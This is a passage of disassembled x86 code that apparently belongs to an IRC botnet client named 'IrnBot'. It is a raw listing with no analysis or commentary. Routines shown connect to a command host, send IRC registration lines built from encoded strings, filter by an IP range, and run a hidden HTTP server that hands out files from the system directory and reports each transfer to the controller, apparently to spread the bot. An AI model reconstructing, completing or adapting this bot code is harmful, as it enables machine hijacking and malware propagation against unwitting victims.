loc_4188C1: ; CODE XREF: sub_418884+8Bj
call ds:dword_41D280 ; closesocket
xor al, al
jmp loc_418B1E
; ---------------------------------------------------------------------------
loc_4188CE: ; CODE XREF: sub_418884+3Aj
push 1FFh
lea eax, [ebp+var_22F]
push 0
push eax
mov [ebp+var_230], 0
call sub_407F20
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_419F0A
pop ecx
mov eax, esi
push eax
call ds:dword_41D244 ; gethostbyname
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_418911
loc_41890D: ; CODE XREF: sub_418884+E7j
push dword ptr [edi]
jmp short loc_4188C1
; ---------------------------------------------------------------------------
loc_418911: ; CODE XREF: sub_418884+87j
push 200h
lea eax, [ebp+var_230]
push ebx
push eax
call sub_407F20
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call sub_407FA0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D270 ; htons
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D23C ; connect
test eax, eax
jnz short loc_41890D
push 10h
call sub_402A14
pop ecx
mov esi, eax
push esi
call sub_402E11
pop ecx
push dword ptr [edi]
mov ecx, eax
call sub_4197F4
pop ecx
mov eax, esi
mov ecx, offset a142_20__ ; "142.20.*.*"
call sub_41987A
test eax, eax
push esi
jz short loc_4189A5
call sub_402F67
pop ecx
push ebx
call sub_419CB0
loc_4189A5: ; CODE XREF: sub_418884+113j
call sub_402F67
mov eax, [ebp+var_44C]
pop ecx
lea edx, [eax+1]
loc_4189B4: ; CODE XREF: sub_418884+135j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4189B4
sub eax, edx
jz short loc_418A2A
xor eax, eax
mov [ebp+var_18], bl
lea edi, [ebp+var_17]
stosd
push 1FFh
stosd
lea eax, [ebp+var_42F]
push ebx
push eax
mov [ebp+var_430], bl
call sub_407F20
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_419F0A
pop ecx
push 9
lea esi, [ebp+var_18]
mov ebx, offset aSatt ; "‘€’’"
call sub_419F0A
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax
push offset aSS_8 ; "%s %s\r\n"
call sub_417ABC
add esp, 0Ch
xor ebx, ebx
loc_418A2A: ; CODE XREF: sub_418884+139j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+var_C], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_41967F
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_41964D
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_9 ; "%s-%s"
lea eax, [ebp+var_C]
push 6
push eax
call sub_402EBA
lea eax, [ebp+var_C]
add esp, 1Ch
lea esi, [eax+1]
loc_418AB1: ; CODE XREF: sub_418884+232j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418AB1
sub eax, esi
mov [ebp+eax+var_C], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset aPivk ; "ˆ‚Š"
stosb
call sub_419F0A
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset aFtdu ; "”’„“"
call sub_419F0A
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_417C7B
push ebx
lea eax, [ebp+var_C]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_417ABC
add esp, 18h
mov al, 1
loc_418B1E: ; CODE XREF: sub_418884+45j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn 8
sub_418884 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418B2F proc near ; DATA XREF: sub_41C2E2+394o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_4195CE
mov edi, dword_4280F8
mov esi, dword_4280FC
loc_418B48: ; CODE XREF: sub_418B2F+5Aj
call sub_4195CE
cmp dword_4280FC, esi
jl short loc_418B72
jg short loc_418B5F
cmp dword_4280F8, edi
jbe short loc_418B72
loc_418B5F: ; CODE XREF: sub_418B2F+26j
cmp byte_428520, 0
jz short loc_418B72
push offset dword_42851C
call sub_41881F
loc_418B72: ; CODE XREF: sub_418B2F+24j
; sub_418B2F+2Ej ...
mov edi, dword_4280F8
mov esi, dword_4280FC
push 0C350h
call ds:off_41D0F8
jmp short loc_418B48
sub_418B2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B8B proc near ; CODE XREF: sub_419319+1Ep
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_4281F4
push dword_42830C
mov [ebp+var_4], 10h
call ds:dword_41D234 ; accept
leave
retn
sub_418B8B endp
; =============== S U B R O U T I N E =======================================
sub_418BAD proc near ; CODE XREF: sub_418D80+1D2p
arg_0 = dword ptr 4
jmp short loc_418BB2
; ---------------------------------------------------------------------------
loc_418BAF: ; CODE XREF: sub_418BAD+14j
mov byte ptr [eax], 5Ch
loc_418BB2: ; CODE XREF: sub_418BADj
push 2Fh
push [esp+4+arg_0]
call sub_403C10
test eax, eax
pop ecx
pop ecx
jnz short loc_418BAF
retn
sub_418BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BC4 proc near ; CODE XREF: sub_418D80+192p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_418BD5: ; CODE XREF: sub_418BC4+16j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418BD5
sub eax, ecx
inc eax
push eax
call sub_402A14
mov ebx, eax
push ebx
call sub_402E11
push eax
push 0
push ebx
call sub_407F20
push 25h
push esi
call sub_403C10
add esp, 1Ch
test eax, eax
jnz short loc_418C4E
loc_418C05: ; CODE XREF: sub_418BC4+114j
mov eax, esi
mov edx, esi
loc_418C09: ; CODE XREF: sub_418BC4+4Aj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418C09
mov edi, ebx
sub eax, edx
dec edi
loc_418C15: ; CODE XREF: sub_418BC4+57j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418C15
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+arg_0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_418C39: ; CODE XREF: sub_418BC4+7Dj
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_418C39
xor esi, esi
inc esi
jmp loc_418CDF
; ---------------------------------------------------------------------------
loc_418C4B: ; CODE XREF: sub_418BC4+10Ej
mov eax, [ebp+var_8]
loc_418C4E: ; CODE XREF: sub_418BC4+3Fj
mov byte ptr [eax], 0
mov ecx, esi
loc_418C53: ; CODE XREF: sub_418BC4+94j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418C53
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418C61: ; CODE XREF: sub_418BC4+A3j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418C61
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2
push eax
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
rep movsb
call sub_403CD0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push offset asc_420594 ; "%x"
push eax
mov [ebp+var_2], 0
call sub_4039B0
add esp, 18h
test eax, eax
jz short loc_418CDD
mov eax, ebx
lea esi, [eax+1]
loc_418CA9: ; CODE XREF: sub_418BC4+EAj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418CA9
mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h
push esi
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call sub_403C10
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_418C4B
jmp loc_418C05
; ---------------------------------------------------------------------------
loc_418CDD: ; CODE XREF: sub_418BC4+DEj
xor esi, esi
loc_418CDF: ; CODE XREF: sub_418BC4+82j
push ebx
call sub_402F67
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418BC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CED proc near ; CODE XREF: sub_418D80+A1p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42057C ; "\r\n"
push esi
mov [ebx], esi
mov [eax], esi
call sub_403B70
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_418D19
loc_418D15: ; CODE XREF: sub_418CED+52j
; sub_418CED+69j ...
xor eax, eax
jmp short loc_418D7D
; ---------------------------------------------------------------------------
loc_418D19: ; CODE XREF: sub_418CED+26j
push offset asc_420580 ; " "
push esi
mov byte ptr [edi], 0
call sub_403DF4
mov ecx, [ebp+arg_0]
push offset asc_420584 ; " "
push 0
mov [ecx], eax
call sub_403DF4
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_418D15
push offset asc_420588 ; " "
push 0
call sub_403DF4
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_418D15
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_418D7A
push offset asc_42058C ; "\r\n\r\n"
push eax
call sub_403B70
test eax, eax
pop ecx
pop ecx
jz short loc_418D15
mov byte ptr [eax+2], 0
loc_418D7A: ; CODE XREF: sub_418CED+76j
xor eax, eax
inc eax
loc_418D7D: ; CODE XREF: sub_418CED+2Aj
pop edi
pop ebp
retn
sub_418CED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418D80 proc near ; CODE XREF: sub_419319+28p
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
var_908 = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+0CA8h+var_907]
push ebx
push eax
mov [ebp+0CA8h+var_908], bl
call sub_407F20
push esi
lea eax, [ebp+0CA8h+var_507]
push ebx
push eax
mov [ebp+0CA8h+var_508], bl
call sub_407F20
push 103h
lea eax, [ebp+0CA8h+var_107]
push ebx
push eax
mov [ebp+0CA8h+var_108], bl
call sub_407F20
push esi
lea eax, [ebp+0CA8h+var_D07]
push ebx
push eax
mov [ebp+0CA8h+var_D08], bl
call sub_407F20
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D26C ; recv
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+var_D20]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+var_D24]
lea esi, [ebp+0CA8h+var_D08]
call sub_418CED
add esp, 0Ch
test eax, eax
jz loc_419302
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_418F0E
push offset aQue? ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+var_908]
push esi
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_908]
add esp, 0Ch
lea edx, [eax+1]
loc_418E6A: ; CODE XREF: sub_418D80+EFj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418E6A
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+var_908], bl
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418E85: ; CODE XREF: sub_418D80+10Aj
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418E85
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_418EAD: ; CODE XREF: sub_418D80+132j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418EAD
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418EC6: ; CODE XREF: sub_418D80+14Bj
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418EC6
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418EEF: ; CODE XREF: sub_418D80+174j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418EEF
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_908]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
jmp loc_4192F5
; ---------------------------------------------------------------------------
loc_418F0E: ; CODE XREF: sub_418D80+C1j
mov edi, [ebp+0CA8h+var_D24]
push edi
call sub_418BC4
test eax, eax
pop ecx
jz loc_419301
mov eax, edi
lea edx, [eax+1]
loc_418F25: ; CODE XREF: sub_418D80+1AAj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F25
sub eax, edx
cmp eax, 1
jbe loc_419077
inc edi
push 2Fh
push edi
call sub_403C10
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_418FD4
mov [esi], bl
inc esi
push esi
call sub_418BAD
push ebx
push esi
call sub_403C10
add esp, 0Ch
cmp [esi], bl
jz short loc_418F9D
cmp byte ptr [eax-1], 5Ch
jz short loc_418F9D
push esi
push edi
push offset dword_428208
push offset aSSS ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_108]
add esp, 18h
lea esi, [eax+1]
loc_418F94: ; CODE XREF: sub_418D80+219j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418F94
jmp short loc_419003
; ---------------------------------------------------------------------------
loc_418F9D: ; CODE XREF: sub_418D80+1E3j
; sub_418D80+1E9j
push offset dword_428418
push esi
push edi
push offset dword_428208
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_108]
add esp, 1Ch
lea esi, [eax+1]
loc_418FCB: ; CODE XREF: sub_418D80+250j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418FCB
jmp short loc_419003
; ---------------------------------------------------------------------------
loc_418FD4: ; CODE XREF: sub_418D80+1C8j
push edi
push offset dword_428208
push offset aSS_4 ; "%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_108]
add esp, 14h
lea esi, [eax+1]
loc_418FFC: ; CODE XREF: sub_418D80+281j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418FFC
loc_419003: ; CODE XREF: sub_418D80+21Bj
; sub_418D80+252j
sub eax, esi
mov [ebp+eax+0CA8h+var_108], bl
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_428310
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz short loc_419079
mov esi, 200h
push esi
call sub_403AAC
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407F20
add esp, 10h
push offset aQue?_1 ; "Que?"
push edi
call sub_402E11
pop ecx
dec eax
push eax
push edi
call sub_402EBA
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_41905A: ; CODE XREF: sub_418D80+2DFj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41905A
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_41906B: ; CODE XREF: sub_418D80+2F0j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41906B
jmp loc_41915C
; ---------------------------------------------------------------------------
loc_419077: ; CODE XREF: sub_418D80+1B1j
xor ebx, ebx
loc_419079: ; CODE XREF: sub_418D80+2A1j
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp+0CA8h+var_108]
push eax
call ds:off_41D06C
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0CA8h+var_D24], esi
jz short loc_41910D
push ebx
push esi
call ds:off_41D070
mov edi, eax
push edi
mov [ebp+0CA8h+var_D1C], edi
call sub_403AAC
push edi
push ebx
push eax
mov [ebp+0CA8h+var_D20], eax
call sub_407F20
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:off_41D074
call esi ; sub_44427E
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:off_41D078
jmp short loc_4190FF
; ---------------------------------------------------------------------------
loc_4190D7: ; CODE XREF: sub_418D80+389j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_419161
push [ebp+0CA8h+var_D1C]
push ebx
push [ebp+0CA8h+var_D20]
call sub_407F20
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+var_D24]
call esi ; sub_44427E
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4190FF: ; CODE XREF: sub_418D80+355j
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+var_D24]
call edi ; sub_447D87
test eax, eax
jnz short loc_4190D7
jmp short loc_419161
; ---------------------------------------------------------------------------
loc_41910D: ; CODE XREF: sub_418D80+31Aj
mov esi, 200h
push esi
call sub_403AAC
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407F20
add esp, 10h
push offset aQue?_0 ; "Que?"
push edi
call sub_402E11
pop ecx
dec eax
push eax
push edi
call sub_402EBA
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_419144: ; CODE XREF: sub_418D80+3C9j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419144
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_419155: ; CODE XREF: sub_418D80+3DAj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419155
loc_41915C: ; CODE XREF: sub_418D80+2F2j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_419161: ; CODE XREF: sub_418D80+35Aj
; sub_418D80+38Bj
push 400h
lea eax, [ebp+0CA8h+var_508]
push ebx
push eax
call sub_407F20
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh
push eax
call sub_402EBA
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_419198: ; CODE XREF: sub_418D80+41Dj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419198
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_4191B1: ; CODE XREF: sub_418D80+436j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4191B1
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_4192EC
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+arg_0]
call esi ; send
test eax, eax
jz loc_4192EC
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_428310
call sub_402C75
test eax, eax
pop ecx
pop ecx
jnz loc_4192EC
push 100h
call sub_402A14
mov esi, eax
push esi
call sub_402E11
push eax
mov ebx, offset aTtzf ; "â⇔"
call sub_419F0A
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+var_D24]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+var_D24], 10h
call ds:dword_41D278 ; getpeername
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D224 ; gethostbyaddr
test eax, eax
push dword_4354A8
jnz short loc_4192B4
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi
push 0
push offset dword_42851C
call sub_417B51
add esp, 24h
jmp short loc_4192DF
; ---------------------------------------------------------------------------
loc_4192B4: ; CODE XREF: sub_418D80+507j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi
push 0
push offset dword_42851C
call sub_417B51
add esp, 28h
loc_4192DF: ; CODE XREF: sub_418D80+532j
inc dword_4354A8
push esi
call sub_402F67
pop ecx
loc_4192EC: ; CODE XREF: sub_418D80+453j
; sub_418D80+46Aj ...
push [ebp+0CA8h+var_D20]
call sub_4039CF
pop ecx
loc_4192F5: ; CODE XREF: sub_418D80+189j
push [ebp+0CA8h+arg_0]
call ds:dword_41D280 ; closesocket
loc_419301: ; CODE XREF: sub_418D80+19Aj
pop edi
loc_419302: ; CODE XREF: sub_418D80+ABj
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 0CA8h
leave
retn
sub_418D80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419319 proc near ; DATA XREF: sub_41946E+27o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 00450F1F SIZE 0000000B BYTES
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_41932C
pop ebp
jmp ds:off_41D1FC
; ---------------------------------------------------------------------------
loc_41932C: ; CODE XREF: sub_419319+Aj
mov eax, [ebp+arg_C]
dec eax
jz short loc_41933E
sub eax, 7
jnz short loc_419347
call sub_418B8B
jmp short loc_419347
; ---------------------------------------------------------------------------
loc_41933E: ; CODE XREF: sub_419319+17j
push [ebp+arg_8]
call sub_418D80
pop ecx
loc_419347: ; CODE XREF: sub_419319+1Cj
; sub_419319+23j
xor eax, eax
pop ebp
retn 10h
sub_419319 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41934D proc near ; CODE XREF: sub_41946E+9Bp
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi
xor ebp, ebp
push ebp
mov ebx, offset dword_428208
push ebx
call sub_407F20
push edi
push ebp
mov esi, offset dword_428418
push esi
call sub_407F20
push edi
push ebp
mov ebp, offset byte_428310
push ebp
call sub_407F20
add esp, 24h
push edi
push ebx
call ds:dword_41D0F0 ; GetSystemDirectoryA
push edi
mov ebx, offset aVQdD ; "¢³²²²ï¤¹¤"
call sub_419F0A
push esi
push offset dword_428208
push offset aSS_1 ; "%s\\%s"
push 103h
push ebp
call sub_402EBA
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_4193B3: ; CODE XREF: sub_41934D+6Bj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4193B3
push 0
push 1
sub eax, ecx
push 2
mov byte_428310[eax], dl
call ds:dword_41D220 ; socket
cmp eax, 0FFFFFFFFh
mov dword_42830C, eax
jnz short loc_4193E6
push eax
loc_4193D9: ; CODE XREF: sub_41934D+E7j
call ds:dword_41D280 ; closesocket
xor eax, eax
jmp loc_419469
; ---------------------------------------------------------------------------
loc_4193E6: ; CODE XREF: sub_41934D+89j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_419AFD
push eax
mov dword_4280F4, eax
mov word_4281F4, 2
call ds:dword_41D270 ; htons
and dword_4281F8, 0
push 10h
push offset word_4281F4
push dword_42830C
mov word_4281F6, ax
call ds:dword_41D27C ; bind
test eax, eax
jz short loc_419436
loc_41942E: ; CODE XREF: sub_41934D+102j
; sub_41934D+114j
push dword_42830C
jmp short loc_4193D9
; ---------------------------------------------------------------------------
loc_419436: ; CODE XREF: sub_41934D+DFj
push 9
push 401h
push [esp+18h+arg_0]
push dword_42830C
call ds:dword_41D22C ; WSAAsyncSelect
test eax, eax
jnz short loc_41942E
push 4
push dword_42830C
call ds:dword_41D230 ; listen
test eax, eax
jnz short loc_41942E
inc eax
mov byte_428414, al
loc_419469: ; CODE XREF: sub_41934D+94j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41934D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41946E proc near ; DATA XREF: sub_419545+21o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, dword_428204
push ebx
mov ebx, ds:off_41D1F0
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4270B0
mov [ebp+var_48], offset sub_419319
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx ; sub_4482C0
push edi
push esi
mov [ebp+var_38], eax
call ebx ; sub_4482C0
push edi
push esi
mov [ebp+var_24], eax
call ds:off_41D208
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:off_41D1EC
test ax, ax
jz short loc_41953C
push esi
push dword_428204
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset aIrnbot ; "IrnBot"
push offset dword_4270B0
push esi
call ds:off_41D1F8
push eax
call sub_41934D
test eax, eax
pop ecx
jz short loc_41953C
mov edi, ds:off_41D204
jmp short loc_41952F
; ---------------------------------------------------------------------------
loc_41951B: ; CODE XREF: sub_41946E+CCj
lea eax, [ebp+var_20]
push eax
call ds:off_41D1F4
lea eax, [ebp+var_20]
push eax
call ds:off_41D200
loc_41952F: ; CODE XREF: sub_41946E+ABj
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi ; sub_45A027
test eax, eax
jnz short loc_41951B
loc_41953C: ; CODE XREF: sub_41946E+70j
; sub_41946E+A3j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41946E endp
; =============== S U B R O U T I N E =======================================
sub_419545 proc near ; CODE XREF: sub_4022DF+70p
; sub_41C2E2+3E0p
push 4
mov eax, offset loc_41C9A9
call sub_40497C
push 8
call sub_403417
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_419579
push offset sub_41946E
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_414887
jmp short loc_41957B
; ---------------------------------------------------------------------------
